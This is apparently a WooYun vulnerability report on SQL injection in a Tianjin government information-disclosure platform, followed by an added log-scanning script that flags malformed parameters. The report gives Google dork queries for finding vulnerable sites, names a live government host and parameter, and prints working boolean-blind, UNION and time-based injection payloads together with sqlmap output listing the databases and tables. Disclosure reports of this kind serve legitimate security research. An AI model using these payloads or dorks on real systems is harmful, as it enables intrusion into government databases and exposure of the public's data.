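2014-07-17: Details reported to the vendor; awaiting vendor handling
2014-07-22: Vendor confirmed; details disclosed to the vendor only
2014-07-25: Details opened to third-party security partners
2014-09-15: Details disclosed to core white hats and experts in related fields
2014-09-25: Details disclosed to regular white hats
2014-10-05: Details disclosed to intern white hats
2014-10-15: Details disclosed to the public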
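There are still 3 earlier submissions that have not been reviewed; I am continuing to submit and hoping for support @
WooYun: SQL injection vulnerability in a general-purpose government information disclosure platform
This information disclosure platform is mainly used in Tianjin. I took a look, found that there are other injection points, and compiled them here.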
Google search:
#1 inurl:GZZDInfordetail.jsp?id
#2 inurl:FLGDInfordetail.jsp?id
#3 inurl:gkznInfo.jsp?depcode
#4 inurl:orgsiteInfo.jsp?orgid
#5 inurl:js_NDBGInfordetail.jsp?id
Affected cases (injection points separated by spaces):
http://zwgk.tjhd.gov.cn:8000/gkznInfo.jsp?depcode=BBA15M
---
Place: GET
Parameter: depcode
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: depcode=BBA15M' AND 5496=5496 AND 'bqId'='bqId

    Type: UNION query
    Title: MySQL UNION query (NULL) - 2 columns
    Payload: depcode=-4714' UNION ALL SELECT NULL,CONCAT(0x71726f6d71,0x76476b675449646c7179,0x7172696f71)#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: depcode=BBA15M' AND SLEEP(5) AND 'uxUa'='uxUa
---
[22:34:30] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0.11

available databases [5]:
[*] gbase
[*] govinfo
[*] information_schema
[*] northwind
[*] system
Database: govinfo
[60 tables]
+-----------------------+
| all_info_tbl          |
| appeal                |
| apply_complaint_tbl   |
| apply_delay_tbl       |
| apply_fee_tbl         |
| apply_indictment_tbl  |
| apply_info_tbl        |
| apply_pj_tbl          |
| apply_reply_tbl       |
| apply_update_tbl      |
| applyuserview         |
| au_function_rel       |
| au_operator_info_tbl  |
| au_role_function_rel  |
| au_role_rel           |
| au_user_role_rel      |
| auapprolefunctionview |
| auoperatorroleview    |
| commission_tbl        |
| complaint             |
| con_info_clob_tbl     |
| con_info_reply_tbl    |
| con_info_tbl          |
| dbb_tbl               |
| departments           |
| dir_info_tbl          |
| djlql_tbl             |
| funs                  |
| get_way_tbl           |
| ggl_tbl               |
| gkzn_tbl              |
| info_sort_tbl         |
| link_tbl              |
| mapping               |
| messagerel            |
| ndgzbg_tbl            |
| operation_list_tbl    |
| org_info_tbl          |
| org_info_tbl_bak      |
| org_site_info_tbl     |
| org_user_info_tbl     |
| org_user_info_tbl_bak |
| para_application_rel  |
| para_depart_rank_rel  |
| para_depart_rel       |
| para_org_rel          |
| pdf_tbl               |
| plan_table            |
| rolefuns              |
| roles                 |
| roleusers             |
| rules_info_tbl        |
| sequence              |
| user_roles_funs       |
| users                 |
| visitcount            |
| window_apply_info_tbl |
| work_time_tbl         |
| zdsyh                 |
| zxwh_tbl              |
+-----------------------+
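Added example (not part of the original report, and not the platform's own code): a log-review check for the five JSP pages named above that flags any request whose id, orgid or depcode value does not match the shape seen in the report's sample URLs. The parameter shapes, the Common Log Format input, and the names check_request and scan_log are assumptions made for this illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Allow-list of parameter shapes, inferred from the sample URLs on this page
# (assumption: id/orgid are integers, depcode is six upper-case alphanumerics).
NUM = re.compile(r"\d{1,9}")
ENDPOINT_RULES = {
    "GZZDInfordetail.jsp": {"id": NUM},
    "FLGDInfordetail.jsp": {"id": NUM},
    "js_NDBGInfordetail.jsp": {"id": NUM},
    "orgsiteInfo.jsp": {"orgid": NUM},
    "gkznInfo.jsp": {"depcode": re.compile(r"[A-Z0-9]{6}")},
}
# Request field of a Common Log Format line: "METHOD target PROTOCOL".
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def check_request(target):
    """Return the (param, decoded value) pairs that break the allow-list."""
    parts = urlsplit(target)
    rules = ENDPOINT_RULES.get(parts.path.rsplit("/", 1)[-1])
    if rules is None:
        return []  # not one of the five affected pages
    params = parse_qs(parts.query, keep_blank_values=True)  # URL-decodes values
    return [(name, value)
            for name, pattern in rules.items()
            for value in params.get(name, [])
            if not pattern.fullmatch(value)]

def scan_log(lines):
    """Return [(line_number, violations)] for log lines worth reviewing."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        bad = check_request(match.group(1)) if match else []
        if bad:
            hits.append((number, bad))
    return hits

# Constructed sample log (documentation IP range, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [17/Jul/2014:22:30:01 +0800] "GET /gkznInfo.jsp?depcode=BBA15M HTTP/1.1" 200 5120',
    '192.0.2.44 - - [17/Jul/2014:22:34:29 +0800] "GET /gkznInfo.jsp'
    '?depcode=BBA15M%27%20AND%20SLEEP(5)%20AND%20%27uxUa%27=%27uxUa HTTP/1.1" 200 5120',
    '192.0.2.10 - - [17/Jul/2014:22:35:02 +0800] "GET /tjep/GZZDInfordetail.jsp?id=43 HTTP/1.1" 200 2048',
    '192.0.2.44 - - [17/Jul/2014:22:35:40 +0800] "GET /orgsiteInfo.jsp?orgid=91%27 HTTP/1.1" 500 310',
]

if __name__ == "__main__":
    for number, bad in scan_log(SAMPLE_LOG):
        print(f"line {number}: {bad}")
```

The same allow-list can be enforced in the application before the value reaches the database, alongside parameterized queries.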
Severity: High
Vulnerability Rank: 20
Confirmed at: 2014-07-22 14:23
None yet